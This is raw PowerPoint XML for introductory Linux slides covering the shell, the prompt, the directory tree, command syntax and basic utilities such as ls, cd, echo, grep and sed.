        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251707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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4154984"/>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Linux: The Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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Program that interprets commands and sends them to the OS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Provides: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Built-in commands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Programming control structures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Environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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Linux supports multiple shells.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A typical default is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16386" name="Picture 2" descr="ls and ls -l command">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6463B6CB-0D36-432E-8125-1A8F56365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066" y="4181199"/>
            <a:ext cx="4815417" cy="22656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58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ED2EDDE-38F6-4534-B87A-A8E45D010ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740821" y="2928388"/>
            <a:ext cx="10477500" cy="6519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946DC0-EF34-4381-A3DD-8EA0A1121A40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773932" y="2960440"/>
            <a:ext cx="10411278" cy="5878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E88E22D-F4D7-4AAB-AD8D-A7AD0432BF63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773932" y="3023521"/>
            <a:ext cx="4092787" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username@hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ~]$ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5201424"/>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Linux: The “Prompt”</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>~ is shorthand for your home directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Arrow: Right 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9C34370-1288-4EA1-921A-71B1115B33D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3679069">
            <a:off x="920546" y="2559293"/>
            <a:ext cx="990600" cy="3175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8571201C-9C50-4A1D-833C-1869B49012CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17592854">
            <a:off x="2172301" y="3784330"/>
            <a:ext cx="990600" cy="3175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3F940A4-9DD6-40A8-9721-D025D1E22535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7204641">
            <a:off x="3909015" y="2567231"/>
            <a:ext cx="990600" cy="3175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C63FE46B-E034-4CA3-81A4-1EB0CBF12999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14059808">
            <a:off x="4516337" y="3695824"/>
            <a:ext cx="990600" cy="3175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2331BC-5D74-4E13-BD95-9BE2861C0135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740821" y="1959853"/>
            <a:ext cx="105189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Username</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEA761C7-8C41-40A5-B97E-B6CA700EC507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3830131" y="1964332"/>
            <a:ext cx="166904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Current Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF980999-6DB6-4D28-96EC-15543E0932B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824568" y="4435156"/>
            <a:ext cx="1361270"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System Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FA2C58A-38F3-4007-A32B-6DE735364781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978724" y="4281267"/>
            <a:ext cx="62068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Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70665D3D-DDDE-4FFC-BF65-332AC6EA45F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657613" y="3128965"/>
            <a:ext cx="196066" cy="2902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6605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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2677656"/>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Linux: The Filesystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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structure resembles an upside-down tree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Directories (a.k.a. folders) are collections of files and other directories.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Every directory has a parent except for the root directory.</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Many directories have subdirectories.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="Image result for linux directory structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C25683-5C7C-471F-ADC5-94CB74895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243" y="3780924"/>
            <a:ext cx="6237514" cy="295461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7027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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4893647"/>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Linux: Command Basics</a:t>
            </a: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endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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Command: Command/program that does one thing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Options: Change the way a command does that one thing</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Short form: 	Single-dash and one letter 		e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ls –a</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Long form: 	Double-dash and a word 		e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ls --all</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Argument: Provides the input/output that the command interacts with.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27072D88-1CB5-4927-ADF4-07FDC82D96D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664633" y="2019300"/>
            <a:ext cx="10477500" cy="6519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CD021A-5CD5-49DD-99AB-0199E346ECEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697744" y="2051352"/>
            <a:ext cx="10411278" cy="5878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753B9D-4C61-4841-8D18-CE33A80054AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697744" y="2114433"/>
            <a:ext cx="9336163" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username@hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ~]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356461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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11283115" cy="4524315"/>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Linux: More Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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cd						#change directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>						# my login</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hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>					# name of this computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –a					# more info about this computer</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echo “Hello, world”	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>			# print characters to screen</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echo $HOME	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>				# print environment variable</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echo my login is $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>			# replace $(xx) with program output</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date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>						# print current time/date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>						# print this month’s calendar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sendhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>					# bad command</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cat				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		# display file(s) [concatenate to display]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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85953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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4832092"/>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Linux: Even More Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Pattern scanning and processing language</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cut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Extract selected fields of each line of a file</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diff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Compare two files</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grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Search text for a pattern</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head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Display the first part of files</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less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Display files on a page-by-page basis</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sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Stream editor (esp. search and replace)</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sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Sort text files</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split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Split files</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tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Display the last part of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Translate/delete characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uniq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
